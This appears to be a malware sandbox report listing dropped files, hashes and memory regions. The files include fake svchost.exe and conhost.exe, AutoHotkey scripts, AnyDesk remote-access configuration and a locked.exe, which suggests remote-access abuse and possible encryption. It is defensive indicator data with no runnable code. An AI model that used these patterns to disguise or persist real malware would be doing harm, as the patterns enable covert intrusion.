SHA1 4a2617dbbba0fc65275bbacf6738d604cbfd4eae
SHA256 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16
SHA512 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

MD5 583050ddb118acb68beb4e210b243c53
SHA1 da7a9d361cb60ebe9e767710585cfeb4d0f84444
SHA256 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245
SHA512 de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5

C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat

MD5 c9dc4166ceb77ae5e86ea472b989b34c
SHA1 340ee384d950b11977799791854c793e7347b091
SHA256 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594
SHA512 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe

C:\Users\Admin\Downloads\AnyDesk.exe

MD5 aee6801792d67607f228be8cec8291f9
SHA1 bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA256 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA512 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

memory/4348-30-0x00000000005E0000-0x0000000001D29000-memory.dmp

memory/4700-37-0x00000000005E0000-0x0000000001D29000-memory.dmp

memory/1164-39-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 28ea83fde5dd58635c08a46932ddb4c8
SHA1 63352119e647dfd887032e67ef7c7a1c150ae137
SHA256 d90e87359d02c97d81773683310a6c2437a6fc4274decfab9ee8745000f7a969
SHA512 b171a28e2c9a8711d674943ebaa291613e0617f123e0dcd842601d32399ee96e00c18007c90fc288bac35863de733137025275db14a2d6b36617b696461d4de2

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 a787c308bd30d6d844e711d7579be552
SHA1 473520be4ea56333d11a7a3ff339ddcadfe77791
SHA256 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440
SHA512 da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 0c04ad1083dc5c7c45e3ee2cd344ae38
SHA1 f1cf190f8ca93000e56d49732e9e827e2554c46f
SHA256 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0
SHA512 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 b06492be1b4392d0d2d2e1d34353756c
SHA1 43f488020dacf58aa90d5847d0660da2e31f382d
SHA256 e2fe485af23b5311cdf32417ca5b34b70a9e578fda060e8f3f7f9bbfae01a85a
SHA512 a60bc46a042eb1f2918ae60d9f2179d541a32d644fe0070ba9564493e254da543122c2f8593e8ca6d846138559189c79858ca3413aaba7fcf87c6a9f1512c8d9

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 e1cf0b1986c750165cb4c78386ef0648
SHA1 a4e8187cbdf2063ff154da0dd9c91116df44bb03
SHA256 eb68970fe0ae556917beb2db2f67e93a5378aea6382215b87a8511c40fa83468
SHA512 52ec0052e60ccd13c598d412d430e419dfa9d87cf98726bdc31285c12de6a4c2fa741c396cb4ffe4804d4a79a092114e29fa44f09fc1033e72a93b6e75317226

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 de92c167e233d22b0d6dd303189266eb
SHA1 4659aa69736505312b22a48eff5b0f5d0c3d296b
SHA256 b065e0f5097158a55cd5ff02d3dfb48332b48dfb9ec7819315b33880d7e112a3
SHA512 ea6fefcef06d50af6aeacee9c1492b67bc36ec9a2fdaeeb0a9532da7794d7f31418a6f5789bd97e04139d0e413d60cb3812bd2035052c56945f849b662702150

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 4082bd2835912384e76b58a119707f4a
SHA1 276289594b693479b6c4fe0df9c3adcf73d589d9
SHA256 6f9dc6059704ff2045bff8455c4c1ae1f0df3482310fa074fc26d209dc86dbf3
SHA512 7117830ce477b8570054b4342be631d24b9ee850319f98d307a545b7fb45fb7a1934c7630d3683be0ea3fe16d43a8b30007586feb2a6f9183377c229d74fb6cb

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 e31aa53e5df82868677dc22fec582f4f
SHA1 4c36bdf36c88521ace6b68d5fc1d1b78ecb3432b
SHA256 fbadd1d9e5cddc476efb2935e0ed9542c5ef889bb2eb2c6119919afb98e03c36
SHA512 8544c22301f862391b7fd60f27dfc02379dfeffca3d9a2974d6ac03e78fd0b3f961ce4c99be8e27ce51ebbc9e55d8091358d620a070e06779c4e74c815efff18

memory/4700-141-0x00000000005E0000-0x0000000001D29000-memory.dmp

memory/1164-140-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA512 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

memory/5000-147-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 53104a709dd3d646ed949ab2ce114d8d
SHA1 51f72625311f8867f1da3cbd2f2a9e83bf1b32e9
SHA256 5ba770565afd71d7e197af6df64d525a62df167666f1cad9254473405318aaca
SHA512 25b84cc0408b5079c648d9fb2a1aba70cbf4f5f6112988b995cd00ffae2ab7d7613c2472a5682c2529b7bb6077ee0c16e6e62b86c1e3f1ab2f55db779bd8aad1

memory/4348-189-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\Users\Admin\AppData\Roaming\enc1.mp3

MD5 bbb44733d6b0bd75d6a26a9a4427705f
SHA1 c29d6ec521f30efb23331648a4a7a234b2db3894
SHA256 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507
SHA512 b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3

C:\ProgramData\AnyDesk\system.conf

MD5 b4c040ee0975ae7e298efaecf36d760b
SHA1 a0a2a6e5421de66bb7b31391636aa122e8810712
SHA256 15a89b575da7b48af8ef157d9fe3c174cca484f30b74c4192162ec5c1c9b8d4f
SHA512 12e5209462ebb246ffb021b27256051c23e8c9d0abd2750caa170165ee68736b30a6f8b06c010fe7c7bbb0282ffac73cb0b1e4617b4c44c032dbad81dfefea19

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 299a3d0add9586c846a4995db453c408
SHA1 74a2f40a7446be5b6cccc1a373ec6134bf14cadd
SHA256 b085c6c7919f00080efc268fafb0d1ee7f7555de061df6aa570b2ce5cb0f3010
SHA512 d2e72b3a62c93cb3340b2ee25b4dc0d67091222aa53d860d8e6948acd9640c1cae52b9faf556a86547e4e4f220b3f07eca019a53258290a669f59080df5f6dcc

memory/5524-234-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 4ba0f615ae899d3af14458706041ebd4
SHA1 2dbc3fe4624a5a44f3bc3a98b67c240f0da0726d
SHA256 af1f86b5128814950c456b0b895d56269d818baa2a5de8e09dd0129056372750
SHA512 0bd7b1c95a8242ebaa47f51855310927aa59cb605f52f3a9fc8ae5d91062fb7cfc7bcaa277a09999cbeee8bd487d40a8ee8ab636a096a2f333169670ddec472a

C:\ProgramData\AnyDesk\system.conf

MD5 e64dad7b57d84ab8e5816602d53a44f4
SHA1 576222b4467aa25c4740b705e2061800e3503c83
SHA256 820816c2df12392f7ff15963ce6e6b1119d0a360ac740fb6ccd97c835aa1149a
SHA512 1390af4cc241d6c538860bc4d444aa5c6c22650b0e79d59064c56f7453846d6169c712a3b106a5e30c217cb493cbc16ea1861559265aa315d6998d19343e0c3b

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 9fd56e6388a08018254058517774ba23
SHA1 d04203227eb0ae65dc0a1f3857d26f54e3051ba3
SHA256 26328e402eba779429f0752fcffdaaf3754faea2aea3df4d482778f580d63a16
SHA512 b3e6b7c3f1607ab5fcbe5bdcb47c133c1981e4fa4173b688f3cfa93694937b2d97b1f5a9d7807cbc455d8ee34757abb1afab9bb08603c9e375d0f61efaf521db

memory/5616-249-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\ProgramData\AnyDesk\service.conf

MD5 a1ac576efd51e7848e490c0659aaa764
SHA1 7d46a45e5fb31cfcd1da8299e21bdb1532e2dd24
SHA256 40ef916c45e8856486c6413bdae3c7b30b40c72e7fa8a0ee89477ac7009f1ec4
SHA512 114c67f536ed73cfc2cfd208211ba92a4fb271130e90279ae80623724fab259c9c91e2ee9c1e2f72002ed89a238af7240231f1cbde00e2443ebe37f3967193d7

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 ec932c86efcc80452ae4c5ca0db5c6a3
SHA1 207b03da5659fe6b57403b5cc7390b4caf34f8ce
SHA256 0d7c255061cd8f1996bef11e9c9b3086b04f2b231db6e1ae7bfb665a93af65b2
SHA512 98316e5362191699b202dd4c8226ca93a650c75c08e5f46a99248a985aaaecc2a6c3f1e74bd0db266d1e78bb25f5c708e397b23e0cc8a8584503c66cf02dc3c1

memory/5616-255-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\locked.exe

MD5 6d97d6c2be27f7633da8432a5f90ccd2
SHA1 5ffca0110e122848b772e563f74c057d7f782664
SHA256 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a
SHA512 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce

memory/776-266-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 5d22282e21e819c188c9a5153e785903
SHA1 61b90af93d494d264237bd14992d6fef0bd30a38
SHA256 d656c77dfb123675b5eba3768fc995df40648f9b401fcbe69e2c5f1a219994d5
SHA512 461faf743750848e824ef91b430697310279f8ef164465aa4f2793f044cda950896e733f83d97cd500956692e0b323f8f4d369fa77ae29e7f65b33bc6589bb4b

C:\ProgramData\AnyDesk\system.conf

MD5 a76627edf8de4838a8acd7a0fac60c37
SHA1 719ae0a6605b7df5dd2f64c868ab5b2cf6ad0b57
SHA256 01c5f9ba4628a54c5099dddedee57ca6bff5a77ccfc993bdccfd755d4af2f4ca
SHA512 5162218b7f15f3c47805bbf768ed85659659961045a783179d88cea07c84e4a7e037cdf8c5083a096141fc8cef70da36b63c107a6f7e02d72a512c188f7689eb

C:\ProgramData\AnyDesk\service.conf

MD5 a979dc84ede87fd1c06d6fd5a9555111
SHA1 8d25834eb4fac819561008aa8a945b99af960f45
SHA256 c4e764a4b98886aa2a0a5296b57eee9cb25237bd8e995c6487b1336151ea4931
SHA512 d7af4d901fbcf47c9236b948b8cf1703da77b39c260421c6696845ed9e27ad090fb1c7acebaacd0c574143a7b6db901f6411ef12996bb16f2924258fd06bac77

C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat

MD5 4c8f4515dd2087309a35099fe2fffa35
SHA1 e75acce86a90f2996dc28a1de705cb708d753b37
SHA256 90a8a7ffa3265396f7d69509ef5652ef8bc69e241d4b63cdeca1baee1fa1fea6
SHA512 8699e45bf3ae83d60f913dcad302dfb8de3267cdb1fe6fa8813ea9c7c2c54d9b8bc9798dbcdcf9f1c4438f06226bf5e036a421d66892e9447722f434d08aa1d9

memory/776-274-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5488-280-0x000001D41EBE0000-0x000001D41EC02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqupw5xj.y2a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\users\Admin\downloads\stn.exe

MD5 5a1f7251dc370ebecd121ec50c3c7687
SHA1 63e672099264cdaecb7b23e9533da2e52e819de5
SHA256 ced26842f55378cc57ca36f3ae366b59e96eeb5a8a0abbc000eb72f16df01ee8
SHA512 afe17a4bf0e511c40072cb614ef619f10eaec878538299223946231658c4da1f7e652ca3b1dfe848da2ff8b17d8a47cfd9c76f6b35fee3a488b7407bb82be493

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

C:\Users\Admin\AppData\Roaming\doorbell2.ahk

MD5 d61c68849186eb9dbea169cceb79c2a6
SHA1 baca62e884a3d7dccae18ef64096db4d562def39
SHA256 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e
SHA512 deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0

C:\ProgramData\svchost.exe

MD5 195594bf561f51edd8f766783b8c4791
SHA1 4be31254244e495bcb85b7dfcde98ca6be8789a0
SHA256 57a5abd41f0b9e52dc6390cecbe9caf1a6f2bbc73a9baba61a0fd57c7eb9e52a
SHA512 4a0df7637351a649458bae2b20a3317cb40b82ff03e4c53900b581a553626bf270f716d4deae19af86984012dfe22f5d92f5172ac1e6794c1956a792602123cc

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\users\Admin\downloads\conhost.exe

MD5 3f609615628633f1ff84e6e73ed31ec0
SHA1 0015273fd5533b876b69dbbb1a0257b8f491c11f
SHA256 4fb9a00c6e3f24ac9cd7f171e1ffe1dcf3aecbe62defea080cd791c54767e2b4
SHA512 fc40a832de74166b21bc79f71947d053d3dfa5da87e5a0412349adf115955d09e078fa3849085d7afc1c3e537f6be83b88df235ba4cdf127e7d6e0406bf2d7a1

memory/5848-331-0x00007FF70C750000-0x00007FF70C848000-memory.dmp

memory/5848-340-0x00007FFCCBC90000-0x00007FFCCBCA1000-memory.dmp

memory/5848-348-0x00007FFCCB910000-0x00007FFCCB92B000-memory.dmp

memory/5524-330-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5000-329-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5848-352-0x000002D106CA0000-0x000002D106CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/5848-349-0x000002D107BA0000-0x000002D10940F000-memory.dmp

memory/5848-351-0x000002D106C80000-0x000002D106C91000-memory.dmp

memory/5848-347-0x00007FFCCB930000-0x00007FFCCB941000-memory.dmp

memory/5848-346-0x00007FFCCB960000-0x00007FFCCB971000-memory.dmp

memory/5848-343-0x00007FFCCB9A0000-0x00007FFCCB9C1000-memory.dmp

memory/5848-345-0x00007FFCCB980000-0x00007FFCCB991000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d07f5f735cdea1655d0a91c8ee2e1f85
SHA1 466d2b3e488ccd0bc22d67728769ff7d911e972b
SHA256 eb067e633d59da091a04f4d5a0175f79c8cef4ee6c50a049ad229ed7528d9c81
SHA512 54d6737e448ae5b7b3b160a099be9a52d4db664553f9b44bfa5d2722325989360655b46423d80ec36120cbb65ec875debc5e91f8f2af04a36d33e6ae22d91f16

memory/5848-344-0x00007FFCCBC20000-0x00007FFCCBC38000-memory.dmp

memory/5848-342-0x00007FFCCBC40000-0x00007FFCCBC81000-memory.dmp

memory/5848-341-0x00007FFCBC570000-0x00007FFCBC77B000-memory.dmp

memory/5848-339-0x00007FFCCBCB0000-0x00007FFCCBCCD000-memory.dmp

memory/5848-338-0x00007FFCCBCD0000-0x00007FFCCBCE1000-memory.dmp

memory/5848-337-0x00007FFCCBF10000-0x00007FFCCBF27000-memory.dmp

memory/5848-336-0x00007FFCCBF30000-0x00007FFCCBF41000-memory.dmp

memory/5848-335-0x00007FFCCBF50000-0x00007FFCCBF67000-memory.dmp

memory/5848-334-0x00007FFCCC0D0000-0x00007FFCCC0E8000-memory.dmp

memory/5848-333-0x00007FFCBC780000-0x00007FFCBCA36000-memory.dmp

memory/5848-332-0x00007FFCCC490000-0x00007FFCCC4C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Roaming\doorbell.ahk

MD5 952ea1033b5f83c25ce5133944e4a65d
SHA1 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5
SHA256 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a
SHA512 b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 09c40d1a114dc5a068e680ab67a5824c
SHA1 3c9d360d5c34638e4e3de3417c7f7f1b47e48eee
SHA256 b159c5c30b0f5143289d8c655f7fa9ecc04d102e5a5ce760772309c1892175a7
SHA512 795244bf21786e16a2f4843db7db27bc938d25fe50fa71665163fe55f65de6cfae5e7351dc3779291205541379a47726e13081ae7e1dbde89742f47e94eef602

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a9a9b8c327fc89d4b2e03cf7d8f0cca4
SHA1 b31953075db379e188400242985db5672df9e4ad
SHA256 8fdb37310ee7035cab6966aad39c8db7d0e5bc117e0b5f0fa97aff8cbcc4a1ce
SHA512 a6bd79b3fdaba75408091629d0b6bc306a01b4701bddb87101b5259f15b7805fd45248a7ca90172062cf8bf207e2117a25099ceeede7a15b0ad762c75f27a7c7

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 99f781eb1d61bcb5fd6c77ced667fd47
SHA1 4ca95de59e3b952ea8b640cc5f9f5d26b2055af3
SHA256 5cebb7a97ca8255bc1e3667ab3ca2ec996b89a1f8d02c8a92dae3ca9cc6e47d0
SHA512 da43c3750f50ee3eec255af8f3146efa3bcacd1b6e8c7141bc517c48321869ec453b2d18d48ed19845d2758f8d0c2bc7eff07745ebff63f474199ef3070b9d88

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 accb531e589ed0273a14babbd5b3c80d
SHA1 67e28633d5e7d181fe9888e8f5849cef0b08cb83
SHA256 52af42098293b07d2bb7105b3af93fd131c319f803bf4d557984f34161522bd2
SHA512 82546db0a98edb6a5e8666459c9bfeeedb4153497fcb1681d14988c3161bd266d340b19efecc165eb69712e8345a4fc7cfb9105263cb46c1d94a4ccf27078c6b

C:\ProgramData\gcapi.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e